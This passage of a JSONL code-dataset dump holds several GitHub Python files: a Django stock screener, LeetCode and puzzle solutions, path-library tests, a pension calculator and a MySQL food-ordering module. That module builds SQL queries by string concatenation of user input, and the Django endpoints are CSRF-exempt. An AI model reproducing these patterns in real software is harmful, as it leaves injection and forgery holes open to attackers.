in ignored_keys\n 
}\n","repo_name":"gnn-tracking/hyperparameter_optimization","sub_path":"src/gnn_tracking_hpo/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"36449891366","text":"from types import ClassMethodDescriptorType\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.db import IntegrityError\nfrom .models import User, SavedSearch\nfrom django.conf import settings\nfrom django import forms\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import JsonResponse\nimport json\nimport os\n\nfrom datetime import date, datetime, timedelta\nfrom dateutil.relativedelta import relativedelta\n\nimport plotly.graph_objects as go\n\nimport pandas as pd\nimport yfinance as yf\nimport string\n\nfrom .utils import get_change_info, make_graph_1, make_graph_2, prep_graph_data, get_SP_500_dict\n\nsp500 = get_SP_500_dict()\n\nclass StockForm(forms.Form):\n stock = forms.CharField(label = 'Stock name', max_length=5, widget=forms.TextInput(attrs={'autofocus': True, 'placeholder':'AAPL'})) \n \ndef index(request):\n\n if request.method == \"GET\": \n return render (request, \"stockscreener/index.html\", {\"stockForm\": StockForm()})\n \n if request.method == \"POST\":\n if 'stock' in request.POST:\n stockForm = StockForm(request.POST) \n if stockForm.is_valid():\n stock = stockForm.cleaned_data['stock'].upper()\n \n if stock not in sp500:\n message = \"Sorry, this ticker does not appear to be in S&P 500\"\n context = {\n \"message\":message, \n \"stockForm\": StockForm\n }\n return render (request, \"stockscreener/index.html\", context)\n \n else:\n data1, data2 = prep_graph_data(stock)\n stockFull = sp500[stock] \n closing_price, change = get_change_info(data1, stock)\n graph1 = make_graph_1(data1, stock, 470, 630)\n graph2 = make_graph_2(data2, stock, 470, 630)\n watchlisted = False\n stockID = None\n\n if request.user.is_authenticated:\n searchObj = SavedSearch.objects.filter(user = request.user, stock = stock)\n if len(searchObj): \n watchlisted = True\n stockID = searchObj[0].id\n\n context = {\n \"stockForm\": stockForm, \n \"stock\":stock,\n \"stockFull\":stockFull,\n \"stockID\":stockID,\n \"closing_price\":closing_price,\n \"change\": change,\n \"watchlisted\":watchlisted, \n \"graph1\":graph1, \n \"graph2\":graph2\n }\n \n return render(request, \"stockscreener/index.html\", context)\n\ndef ticker_list(request):\n abcTickers = {}\n abc = string.ascii_uppercase\n for letter in abc:\n abcTickers[letter]=[]\n for key, value in sorted(sp500.items()):\n if key.startswith(letter):\n abcTickers[letter].append([key, value])\n abcTickers[letter] = sorted(abcTickers[letter])\n sp500abc = sorted(abcTickers.items())\n return render(request, \"stockscreener/ticker_list.html\", {\"sp500abc\":sp500abc})\n\ndef about(request):\n return render(request, \"stockscreener/about.html\")\n \ndef login_view(request):\n if request.method == \"POST\":\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username = username, password = password)\n\n # Check if authentication is successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n 
else:\n return render(request, \"stockscreener/login.html\", {\"message\":\"Invalid username and/or password\"})\n else:\n return render(request, \"stockscreener/login.html\")\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Make sure password matches password confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"stockscreener/register.html\", {\n \"message\":\"Please make sure the passwords match\"\n })\n\n # Attempt to create a new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"stockscreener/register.html\",{\n \"message\":\"Sorry, this username is not available\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"stockscreener/register.html\")\n \n@login_required\ndef watchlist(request):\n if request.method == \"GET\":\n \n if request.user.is_authenticated:\n\n watched_stocks = [] \n watchlist=SavedSearch.objects.filter(user=request.user) \n watchlist=sorted(watchlist, key = lambda p: (p.date), reverse=True)\n\n for item in watchlist: \n stock = item.stock \n watchlist_temp = {} \n watchlist_temp[\"stock\"] = stock\n watchlist_temp[\"stockFull\"] = item.stock_full\n watchlist_temp[\"notes\"] = item.notes \n watchlist_temp[\"stockID\"]= item.id \n watchlist_temp[\"data1\"], watchlist_temp[\"data2\"] = prep_graph_data(stock) \n watchlist_temp[\"closing_price\"], watchlist_temp[\"change\"] = get_change_info(watchlist_temp[\"data1\"], stock) \n watchlist_temp[\"graph1\"] = make_graph_1(watchlist_temp[\"data1\"], stock, 575, 840) \n watchlist_temp[\"graph2\"] = make_graph_2(watchlist_temp[\"data2\"], stock, 575, 840) \n \n watched_stocks.append(watchlist_temp) \n \n return render(request, \"stockscreener/watchlist.html\", {'watched_stocks':watched_stocks})\n\n@csrf_exempt\n@login_required\ndef saved_searches(request):\n\n # Creating a new saved search must be via POST\n if request.method != \"POST\":\n return JsonResponse({\"error\": \"POST request required.\"}, status=400)\n\n # Check received data emails\n data = json.loads(request.body)\n \n stock = data.get(\"stock\")\n if stock == [\"\"]:\n return JsonResponse({\n \"error\": \"Stock name is required.\"\n }, status=400)\n \n # Create a saved search for the logged in user \n savedSearch = SavedSearch(\n user = request.user,\n stock = stock,\n stock_full = sp500[stock], \n )\n savedSearch.save()\n search_id = savedSearch.id \n return JsonResponse({\"message\": \"Search saved successfully\", \"id\":search_id}, status=201)\n\n@csrf_exempt\n@login_required\ndef saved_search(request, search_id):\n \n # Query for requested search\n try:\n search = SavedSearch.objects.get(user=request.user, pk=search_id)\n except SavedSearch.DoesNotExist:\n return JsonResponse({\"error\": \"No such search has been saved for this user.\"}, status=404)\n\n # Return saved search contents\n if request.method == \"GET\":\n return JsonResponse(search.serialize())\n\n # Update notes for the saved search\n elif request.method == \"PUT\":\n data = json.loads(request.body)\n if data.get(\"notes\") is not None:\n search.notes = data[\"notes\"]\n search.save()\n return HttpResponse(status=204)\n\n elif request.method == \"DELETE\":\n 
search.delete()\n return HttpResponse(status=204)\n\n # Search must be via GET, PUT or DELETE\n else:\n return JsonResponse({\n \"error\": \"GET, PUT or DELETE request required.\"\n }, status=400)\n\n","repo_name":"ahsamt/StockScreener","sub_path":"stockscreener/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"26085216327","text":"from leezy import solution, Solution\n\n\nclass Q215(Solution):\n @solution\n def findKthLargest(self, nums, k):\n # 从右向左求的最大,也可以将最大k转成最小K\n def quick_sort(lo, hi, k):\n # if lo >= hi:\n # return\n pivot = nums[lo]\n i, j = lo+1, hi\n while True:\n while i <= hi and nums[i] < pivot:\n i += 1\n while nums[j] > pivot:\n j -= 1\n if i >= j:\n break\n nums[i], nums[j] = nums[j], nums[i]\n i += 1\n j -= 1\n nums[lo], nums[j] = nums[j], nums[lo]\n big_cnt = hi - j + 1\n if big_cnt == k:\n return nums[j]\n if big_cnt > k:\n return quick_sort(j+1, hi, k)\n else:\n return quick_sort(lo, j-1, k-big_cnt)\n\n return quick_sort(0, len(nums)-1, k)\n\n\ndef main():\n q = Q215()\n q.add_case(q.case([3, 2, 1, 5, 6, 4], 2).assert_equal(5))\n q.add_case(q.case([3,2,3,1,2,4,5,5,6], 4).assert_equal(4))\n q.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wowococo/myleetcode","sub_path":"Python/215 - Kth Largest Element in an Array/215_kth-largest-element-in-an-array.py","file_name":"215_kth-largest-element-in-an-array.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20838704965","text":"\"\"\"\nTesting util.Path\n\"\"\"\n\n# pylint: disable=missing-function-docstring\n\nimport pytest\n\nfrom moat.util import P, Path, packer, unpacker, yformat, yload\n\n_valid = (\n ((\"a\", \"b\", \"c\"), \"a.b.c\"),\n ((\"a\", 2, \"c\"), \"a:2.c\"),\n ((2, \"c\"), (\":i2.c\", \":2.c\")),\n ((True, \"c\"), \":t.c\"),\n ((1.23, \"c\"), \":1:.23.c\"),\n ((\"\", 1.23, \"c\"), \":e:1:.23.c\"),\n ((\"a\", \"\", 1.23, \"c\"), \"a:e:1:.23.c\"),\n ((\"a\", \"\", 1.23), \"a:e:1:.23\"),\n ((\"a\", \"\", \"b\"), \"a:e.b\"),\n ((\"a\", \"x y\", \"b\"), (\"a.x y.b\", \"a.x:_y.b\")),\n ((\"a\", True), \"a:t\"),\n ((\"x\", None), \"x:n\"),\n ((31,), (\":x1f\", \":31\")),\n ((31, \"q\"), (\":x1f.q\", \":31.q\")),\n ((\"b\", 31, 5), (\"b:x1f:5\", \"b:31:5\")),\n (((1, 2), 1.23), (\":(1,2):1:.23\", \":1,2:1:.23\")),\n (((1, 2), \"\", 1.23), (\":(1,2):e:1:.23\", \":1,2:e:1:.23\")),\n (((1, 2), \"c\"), \":1,2.c\"),\n (((1, \"a b\", 2), \"c\"), (\":1,'a b',2.c\", \":1,'a:_b',2.c\")),\n ((), \":\"),\n ((\"a\", b\"abc\"), \"a:vabc\"),\n ((\"a\", b\"ab\\x99\"), (\"a:y616299\", \"a:sYWKZ\")),\n ((\"a\", b\"a b\"), \"a:va:_b\"),\n ((\"a\", b\"\", \"c\"), \"a:v.c\"),\n)\n\n_invalid = (\n \":w\",\n \":t:\",\n \"a.b:\",\n \":2..c\",\n \"a..b\",\n \"a.:1\",\n \"a.:t\",\n \":x1g\",\n \":x\",\n \".a.b\",\n \"a.b.\",\n \"a:h123\",\n \"\",\n \":list\",\n \":dict\",\n)\n\n\n@pytest.mark.parametrize(\"a,b\", _valid)\ndef test_valid_paths(a, b):\n if isinstance(b, tuple):\n b, xb = b\n else:\n xb = b\n assert str(Path(*a)) == xb\n assert a == tuple(Path.from_str(b))\n\n\n@pytest.mark.parametrize(\"a\", _invalid)\ndef test_invalid_paths(a):\n with pytest.raises(SyntaxError):\n Path.from_str(a)\n\n\ndef test_paths():\n p = P(\"a.b\")\n assert str(p) == \"a.b\"\n q = p | \"c\"\n assert str(p) == \"a.b\"\n assert str(q) == \"a.b.c\"\n r = p + ()\n assert p is r\n r = p + (\"c\", \"d\")\n 
assert str(p) == \"a.b\"\n assert str(r) == \"a.b.c.d\"\n pp = Path.build((\"a\", \"b\"))\n assert str(p) == str(pp)\n\n\ndef test_tagged():\n p = P(\":mfoo:\")\n assert p.mark == \"foo\"\n assert len(p) == 0\n p = Path()\n p.mark = \"bar\"\n assert str(p) == \":mbar:\"\n p = P(\"a:mx.b\")\n assert p.mark == \"x\" # pylint: disable=no-member\n p = P(\":mx.a.b\")\n assert p.mark == \"x\" # pylint: disable=no-member\n p = P(\":mx.a.b:mx\")\n assert p.mark == \"x\" # pylint: disable=no-member\n p = P(\"a.b:mx\")\n assert p.mark == \"x\" # pylint: disable=no-member\n with pytest.raises(SyntaxError):\n P(\":mx.a:my.b\")\n with pytest.raises(SyntaxError):\n P(\"a:mx.b:my\")\n\n\ndef test_msgpack():\n d = (\"a\", 1, \"b\")\n m = packer(d)\n mm = unpacker(m)\n assert type(mm) is tuple # pylint: disable=unidiomatic-typecheck\n assert mm == d\n\n d = Path(\"a\", 1, \"b\")\n m = packer(d)\n mm = unpacker(m)\n assert type(mm) is Path # pylint: disable=unidiomatic-typecheck\n assert mm == d\n\n d = {\"Hello\": d}\n m = packer(d)\n mm = unpacker(m)\n assert type(mm[\"Hello\"]) is Path # pylint: disable=unidiomatic-typecheck\n assert mm == d\n\n\ndef test_yaml():\n a = Path.from_str(\"a.b.c\")\n b = \"!P a.b.c\\n...\\n\"\n assert yformat(a) == b\n assert yload(b) == a\n","repo_name":"M-o-a-T/moat-util","sub_path":"tests/test_path.py","file_name":"test_path.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74161915997","text":"from __future__ import print_function\nimport mysql.connector\nfrom mysql.connector import errorcode\n\nimport utility_functions\n\n\ndef connectToDatabase():\n cnx = mysql.connector.connect(user='your_username', password='your_password',\n host='127.0.0.1', port='3306',\n database='app_schema')\n return cnx\n\n\ndef getRestaurantNameFromID(cnx, restaurantID):\n cursor = cnx.cursor()\n cursor.execute(\"SELECT restaurantName from restaurant where RestaurantID=\" + str(restaurantID))\n restaurantNameTuple = cursor.fetchone()\n cursor.close()\n return restaurantNameTuple\n\n\ndef getLastOrderInfo(cnx):\n lastOrderId = getLastOrderId(cnx)\n cursor = cnx.cursor()\n # select all rows with orderId = lastOrderId\n cursor.execute('SELECT * from orders where orderID =' + str(lastOrderId))\n fetcAll = cursor.fetchall()\n cursor.close()\n return fetcAll\n\n\ndef getLastOrderId(cnx):\n cursor = cnx.cursor()\n cursor.execute('SELECT orderID FROM orders ORDER BY orderID DESC LIMIT 1')\n lastOrderInfo = cursor.fetchone()\n if lastOrderInfo is None:\n return 0\n else:\n return lastOrderInfo[0]\n\n\ndef getCustomerNameFromID(cnx, customerId):\n cursor = cnx.cursor()\n query = 'SELECT customerName FROM customer where customerID = ' + str(customerId)\n cursor.execute(query)\n customerName = cursor.fetchone()\n return customerName\n\n\ndef isValidUser(cnx, email, passoword):\n cursor = cnx.cursor()\n\n cursor.execute('SELECT * FROM customer where email =\"' + email + '\"')\n customerInfo = cursor.fetchone()\n if customerInfo is None:\n return (-1, None, None)\n else:\n passwordInDB = customerInfo[4]\n # compare entered password with passwordInDB\n isPasswordCorrect = utility_functions.checkPassword(passoword, passwordInDB)\n if not isPasswordCorrect:\n return (-2, None, None)\n else:\n return (1, customerInfo[0], customerInfo[1])\n cursor.close()\n\n\ndef showRestaurants(cnx):\n # written by Jose\n cursor = cnx.cursor()\n showRestQuery = ('SELECT * FROM Restaurant')\n cursor.execute(showRestQuery)\n 
result = cursor.fetchall()\n print('Restaurant ID Restaurants:\\n')\n for r in result:\n print(str(r[0]) + ' ' + r[1] + '\\n')\n cursor.close()\n\n\ndef isValidRestaurant(cnx, restaurantId):\n cursor = cnx.cursor()\n getRestaurant = 'SELECT * from Restaurant R where R.RestaurantID = ' + str(restaurantId)\n cursor.execute(getRestaurant)\n if cursor.fetchone() is None:\n return -1\n else:\n return 1\n\n\ndef getCustomerIDForOrder(cnx, orderID, restaurantId):\n cursor = cnx.cursor(buffered=True)\n query = \"SELECT customerID from orders where orderID=\" + str(orderID) + \" and restaurantId=\" + str(restaurantId)\n cursor.execute(query)\n customerIDTuple = cursor.fetchone()\n cursor.close()\n return customerIDTuple\n\n\ndef orderReady(cnx, orderId, restaurantId):\n cursor = cnx.cursor()\n updateisReady = \"UPDATE orderinfo SET isReady = 1 WHERE orderID=%s AND RestaurantID=%s\"\n values = (orderId, restaurantId)\n cursor.execute(updateisReady, values)\n cnx.commit()\n cursor.close()\n\n\ndef isValidItem(cnx, itemId, restaurantID):\n cursor = cnx.cursor(buffered=True)\n cursor.execute('SELECT * from Menu M where M.ItemID = ' + str(itemId) + ' and M.RestaurantID= ' + str(restaurantID))\n fetchedItem = cursor.fetchone()\n if fetchedItem is None:\n return (-1, None)\n else:\n # return the price of the item\n return (1, fetchedItem[3])\n\n\ndef getItemNameFromItemID(cnx, itemId, restaurantId):\n cursor = cnx.cursor()\n query = ('SELECT ItemName FROM Menu M, Restaurant R WHERE M.RestaurantID=R.RestaurantID AND R.RestaurantID=' + str(\n restaurantId) + ' AND M.ItemID=' + str(itemId))\n cursor.execute(query)\n resultItemName = cursor.fetchone()\n cursor.close()\n return resultItemName\n\n\ndef showRItems(cnx, RSelect):\n # written by Jose\n cursor = cnx.cursor()\n showRItemQuery = (\n 'SELECT ItemID, ItemName, Price FROM Menu M, Restaurant R WHERE M.RestaurantID=R.RestaurantID AND R.RestaurantID=' + RSelect)\n cursor.execute(showRItemQuery)\n result = cursor.fetchall()\n print('Menu for ' + RSelect + '\\n')\n print('Item ID: Item Name: Price: \\n')\n for r in result:\n print(str(r[0]) + ' ' + str(r[1]) + ' ' + str(r[2]) + '\\n')\n cursor.close()\n\n\ndef addOrder(cnx, orderId, restaurantId, itemId, quantity, custId):\n # written by Tarun\n cursor = cnx.cursor()\n query_add_orders = (\"INSERT INTO orders \"\n \"(orderID, ItemID, RestaurantID, customerID, Quantity) \"\n \"VALUES (%s, %s, %s, %s, %s)\")\n values = (orderId, itemId, restaurantId, custId, quantity)\n cursor.execute(query_add_orders, values)\n cnx.commit()\n\n cursor.close()\n\n\ndef getOrdersForCustomer(cnx, customerID):\n cursor = cnx.cursor()\n query = 'SELECT orderID, ItemID, RestaurantID, Quantity FROM orders WHERE customerID=' + str(customerID)\n cursor.execute(query)\n allResultsList = cursor.fetchall()\n cursor.close()\n return allResultsList\n\n\ndef getOrdersForRestaurant(cnx, restuarntId):\n cursor = cnx.cursor()\n query = (\"SELECT * FROM orders where RestaurantID = \" + restuarntId)\n cursor.execute(query)\n allResultsList = cursor.fetchall()\n cursor.close()\n return allResultsList\n\n\ndef getLastNRowsFromOrdersTable(cnx, numRows):\n cursor = cnx.cursor()\n query = \"SELECT * FROM orders ORDER BY orderID DESC LIMIT \" + str(numRows)\n cursor.execute(query)\n allResultsList = cursor.fetchall()\n cursor.close()\n return allResultsList\n\n\ndef addOrderInfo(cnx, totalPrice, readyTime, orderId, restaurantId):\n # written by Tarun\n cursor = cnx.cursor()\n query_add_orderInfo = (\"INSERT INTO orderinfo \"\n \"(orderID, isReady, 
readyTime, totalPrice, isOrderPickedUp, RestaurantID) \"\n \"VALUES (%s, %s, %s, %s, %s, %s)\")\n # orderExpirationDateTime = readyTime + 1 hr\n # we'll not implement expirationDateTime, instead we'll have a script/cronjob that runs at 3:00 am everyday and deletes all orders\n values = (orderId, 0, readyTime, totalPrice, 0, restaurantId)\n cursor.execute(query_add_orderInfo, values)\n cnx.commit()\n\n cursor.close()\n\n\ndef getReadyTimeForOrder(cnx, orderId, RestaurantID):\n cursor = cnx.cursor(buffered=True)\n query = 'SELECT readyTime from orderinfo where orderID=' + str(orderId) + ' AND RestaurantID=' + str(RestaurantID)\n cursor.execute(query)\n readyTimeTuple = cursor.fetchone()\n cursor.close()\n return readyTimeTuple\n\n\ndef addAccount(cnx, balance):\n # written by Tarun\n cursor = cnx.cursor()\n query_add_account = (\"INSERT INTO account \"\n \"(balance) \"\n \"VALUES (%s)\")\n values = (balance,)\n cursor.execute(query_add_account, values)\n cnx.commit()\n\n cursor.close()\n\n cursor = cnx.cursor()\n count_number_of_accounts_query = \"SELECT COUNT(*) FROM account\"\n cursor.execute(count_number_of_accounts_query)\n numberofRows = cursor.fetchone()[0]\n\n # numberofRows is equal to the account number recently created\n account_number = numberofRows\n\n cursor.close()\n\n return account_number\n\n\ndef addCustomer(cnx, name, email, passWord):\n # written by Tarun\n cursor = cnx.cursor()\n # first create an account\n\n # first check if the email already exists\n\n # we'll need a function to ask how much money they want to put in their account, maybe implement payments -> currently giving a hardcoded value\n account_number = addAccount(cnx, 0)\n\n query_add_customer = (\"INSERT INTO customer \"\n \"(customerName, accountNo, email, pass) \"\n \"VALUES (%s, %s, %s, %s)\")\n\n # add email validation -> https://www.geeksforgeeks.org/check-if-email-address-valid-or-not-in-python/\n data_customer = (name, account_number, email, passWord)\n cursor.execute(query_add_customer, data_customer)\n cnx.commit()\n\n cursor.close()\n\n\ndef cancelOrder(cnx, orderID,\n restaurantID): # cancel order (delete order and notify about cancellation) - written by Jose\n # refund order\n cursor = cnx.cursor(buffered=True)\n\n getTotalPriceQuery = (\n 'SELECT O.totalPrice FROM orderinfo O WHERE O.orderID=' + str(orderID) + ' AND O.RestaurantID=' + str(\n restaurantID))\n cursor.execute(getTotalPriceQuery)\n try:\n totalp = cursor.fetchone()[0]\n except:\n print(\"Order Not Found. 
Please ensure Restaurant and Order IDs are both valid.\")\n return 0\n\n getBalanceQuery = ('SELECT A.balance FROM account A, orders O, customer C WHERE O.orderID=' + str(\n orderID) + ' AND O.customerID=C.customerID AND C.accountNo=A.accountNo' + ' AND O.RestaurantID=' + str(\n restaurantID))\n cursor.execute(getBalanceQuery)\n balan = cursor.fetchone()[0]\n\n getAccountQuery = ('SELECT A.accountNo FROM account A, orders O, customer C WHERE O.orderID=' + str(\n orderID) + ' AND O.customerID=C.customerID AND C.accountNo=A.accountNo' + ' AND O.RestaurantID=' + str(\n restaurantID))\n cursor.execute(getAccountQuery)\n AccountNo = cursor.fetchone()[0]\n\n totalp = float(totalp)\n balan = float(balan)\n balan = balan + totalp\n updateBalanceQuery = ('UPDATE account SET balance=' + str(balan) + ' WHERE accountNo=' + str(AccountNo))\n cursor.execute(updateBalanceQuery)\n\n deleteOrderQuery = ('DELETE FROM orders WHERE orderID=' + str(orderID) + ' AND RestaurantID=' + str(restaurantID))\n cursor.execute(deleteOrderQuery)\n cnx.commit()\n orderDeleteParityCheck(cnx)\n\n cursor.close()\n print('Order ' + str(orderID) + ' from restaurant ' + str(restaurantID) + ' has been canceled and refunded.\\n')\n\n\n# written by Jose\ndef setOrderPickedup(cnx, orderId):\n # Let restaurant change bool pickedup to 1 (true) Check if picked up is true, if so then delete order from order info and orders tables\n cursor = cnx.cursor()\n setPickedUpQuery = ('UPDATE orderinfo SET isOrderPickedUp=1 WHERE orderID=' + str(orderId))\n cursor.execute(setPickedUpQuery)\n cnx.commit()\n cursor.close()\n print('Order ' + str(orderId) + ' has been picked up.\\n')\n\n\n# written by Jose\ndef clearPickedOrders(cnx):\n cursor = cnx.cursor()\n clearPickedQuery = ('DELETE FROM orderinfo WHERE isOrderPickedUp=1')\n cursor.execute(clearPickedQuery)\n cnx.commit()\n orderDeleteParityCheck(cnx)\n cursor.close()\n print('Cleared\\n')\n\n\n# written by Jose, ensures that there are no orphaned Order or orderinfo tables when a row in either is deleted.\ndef orderDeleteParityCheck(cnx):\n cursor = cnx.cursor()\n selectOrdersQuery = ('SELECT orderID FROM orders')\n cursor.execute(selectOrdersQuery)\n ord1 = cursor.fetchall()\n selectOrderInfosQuery = ('SELECT orderID FROM orderinfo')\n cursor.execute(selectOrderInfosQuery)\n ord2 = cursor.fetchall()\n\n match = 0\n for x in ord1:\n for y in ord2:\n if x[0] == y[0]:\n match = 1\n if match == 0:\n deleteOrderQuery = ('DELETE FROM orders WHERE orderID=' + str(x[0]))\n cursor.execute(deleteOrderQuery)\n cnx.commit()\n\n match = 0\n for x in ord2:\n for y in ord1:\n if x[0] == y[0]:\n match = 1\n if match == 0:\n deleteOrderInfoQuery = ('DELETE FROM orderinfo WHERE orderID=' + str(x[0]))\n cursor.execute(deleteOrderInfoQuery)\n cnx.commit()\n cursor.close()\n\n\n# pay for order - written by Jose\ndef payOrder(cnx, total, customerID):\n cursor = cnx.cursor()\n # access account balance\n getAccountNoQuery = ('SELECT A.accountNo FROM account A, customer C WHERE A.accountNo=C.accountNo AND C.customerID='+ str(customerID))\n cursor.execute(getAccountNoQuery)\n AccountNo = cursor.fetchone()[0]\n cursor.execute('SELECT balance FROM account A WHERE A.accountNo=' + str(AccountNo))\n balance = cursor.fetchone()[0]\n balance = float(balance)\n total = float(total)\n # if, order total is greater than account balance, then decline order\n if total > balance:\n print('Insufficient funds in account, order cancelled.\\n')\n cursor.close()\n return False\n # else, decrease balance by order total\n else:\n balance 
-= total\n updateBalanceQuery = ('UPDATE Account SET balance=' + str(balance) + ' WHERE AccountNo=' + str(AccountNo))\n cursor.execute(updateBalanceQuery)\n cnx.commit()\n # notify that payment went through\n print('Payment processed.')\n cursor.close()\n return True\n\n#view and add money to account balance - written by Jose\ndef balanceFunc(cnx, customerID):\n cursor = cnx.cursor()\n #access account balance\n getAccountNoQuery = ('SELECT A.accountNo FROM Account A, Customer C WHERE A.accountNo=C.accountNo AND C.customerID=' + str(customerID))\n cursor.execute(getAccountNoQuery)\n AccountNo = cursor.fetchone()[0]\n getBalanceQuery = ('SELECT balance FROM Account A WHERE A.accountNo=' + str(AccountNo))\n cursor.execute(getBalanceQuery)\n balance = cursor.fetchone()[0]\n balance = float(balance)\n print(\"Current account balance: $\" + str(balance) + \"\\n\")\n command = input(\"Would you like to change your account balance? Y/N: \\n\")\n if command == 'Y':\n newbalance = input(\"Enter amount to be added \\n\")\n newbalance=float(newbalance)\n if newbalance<0:\n print(\"Please enter an amount > 0\")\n return\n balance+=newbalance\n updateBalanceQuery = ('UPDATE Account SET balance=' + str(balance) + ' WHERE accountNo=' + str(AccountNo))\n cursor.execute(updateBalanceQuery)\n cnx.commit()\n print(\"$\"+str(newbalance)+\" added to your account.\")\n print(\"New balance is: $\"+str(balance))\n\n\n","repo_name":"QELiminate/Database-Project","sub_path":"database_operations.py","file_name":"database_operations.py","file_ext":"py","file_size_in_byte":14084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"24928018801","text":"#!/usr/bin/env python3\nSTART_AGE = 60\nCHARGE_PERCENT = 0.45\nINFLATION = 2\n\n\nclass Drawdown:\n def __init__(self, pension_pot, annual_income, growth_percent):\n self.draw_down = {0: (pension_pot, START_AGE)}\n for i in range(1, 400):\n current_pot, current_age = self.draw_down[i - 1]\n calc_val = (current_pot - annual_income / 12) * (1 + (growth_percent - CHARGE_PERCENT) / (100 * 12))\n if calc_val < 0:\n break\n else:\n self.draw_down[i] = (calc_val, current_age + 1/12)\n self.final_age = START_AGE + 1/12 * i\n\n def print_results(self):\n for k, v in self.draw_down.items():\n pot, age = v\n print(str(k).ljust(4), str(round(age, 2)).ljust(6), str(round(pot, 2)))\n\n def any_left(self, age):\n return self.final_age >= age\n\n\nclass Compound:\n def __init__(self, start_balance, month_invest, growth_percent, start_age):\n self.results = {0: (start_balance, start_age)}\n self.start_age = start_age\n month_growth = self._get_monthly_rate(growth_percent)\n month_inf = self._get_monthly_rate(INFLATION)\n month_charge = self._get_monthly_rate(CHARGE_PERCENT)\n\n for i in range(1, 300):\n cur_balance, cur_age = self.results[i - 1]\n new_balance = cur_balance * (1 + month_growth - month_charge - month_inf) + month_invest\n self.results[i] = (new_balance, cur_age + 1/12)\n\n def print_results(self):\n for k, v in self.results.items():\n pot, age = v\n print(str(k).ljust(4), str(round(age, 2)).ljust(6), str(round(pot, 2)))\n\n def final_balance(self, pension_age):\n print ('{} years old : final balance {}'.format(pension_age,\n int(self.results[int((pension_age - self.start_age) * 12)][0])))\n\n def _get_monthly_rate(self, annual_rate):\n return (1 + (annual_rate/100)) ** (1/12) - 1\n\nc = Compound(63500, 300, 8, 36 + 4/12)\nc.print_results()\nc.final_balance(60)\n# d = Drawdown(250000, 14300, 5)\n# d.print_results()\n# 
print(d.any_left(89))\n# print(d.any_left(90))\n\n\n# def get_income(pot, end_age):\n# income_result = [str(pot)]\n# for growth in range(2, 11):\n# for income in range(3000, 50000, 100):\n# m = Drawdown(pot, income, growth)\n# if not m.any_left(end_age):\n# income_result.append(str(income))\n# break\n# print('|'.join(income_result))\n# f.write('|'.join(income_result) + '\\n')\n#\n# with open('draw_down.txt', 'w+') as f:\n# for pot in range(100000, 500001, 10000):\n# get_income(pot, 90)\n\n\n\n\n\n","repo_name":"tomstagg/lab","sub_path":"finance/finance.py","file_name":"finance.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12202801525","text":"class Solution:\n def combine(self, n: int, k: int) -> List[List[int]]:\n if not n or not k:\n return [[]]\n nums = [i for i in range(1, n+1)]\n ans = []\n self.helper(nums, 0, [], ans, k)\n return ans\n \n \n def helper(self, nums, idx, ss, ans, k):\n if len(ss) == k:\n ans.append(ss[:])\n return\n for i in range(idx, len(nums)):\n ss.append(nums[i])\n self.helper(nums, i + 1, ss, ans, k)\n ss.pop()\n return \n ","repo_name":"Jsonghh/leetcode","sub_path":"191217/Combinations.py","file_name":"Combinations.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23482888888","text":"#!/usr/bin/env python3.9\n\nfrom collections import defaultdict\n\n\ndef get_input() -> list[str]:\n with open(\"input.txt\", \"r\") as f:\n return f.read()\n\n\nDAYS = 256\n\n\ndef main():\n lanterns = list(map(int, get_input().split(\",\")))\n\n nums = defaultdict(int)\n for n in lanterns:\n if n not in nums:\n nums[n] = 0\n nums[n] += 1\n\n for d in range(DAYS):\n newnums = defaultdict(int)\n for n, cnt in nums.items():\n if n == 0:\n newnums[6] += cnt\n newnums[8] += cnt\n else:\n newnums[n - 1] += cnt\n nums = newnums\n\n print(sum(nums.values()))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"luisiacc/advent-of-code-2021","sub_path":"day6/main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"8456433263","text":"import numpy as np\nfrom scipy.spatial.transform import Rotation as R\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Slider, Button, RadioButtons\n\n\ndef meshgrid_to_matrix(meshgrid):\n X, Y, Z = meshgrid\n return np.matrix([X.flatten(), Y.flatten(), Z.flatten()]).T\n\n\ndef matrix_to_meshgrid(matrix):\n num_points = int(np.sqrt(matrix.shape[0]))\n X = matrix[:, 0].reshape((num_points, num_points))\n Y = matrix[:, 1].reshape((num_points, num_points))\n Z = matrix[:, 2].reshape((num_points, num_points))\n return [X, Y, Z]\n\n\ndef create_cylinder(radius, height, resolution=10):\n phi = np.linspace(0, 2 * 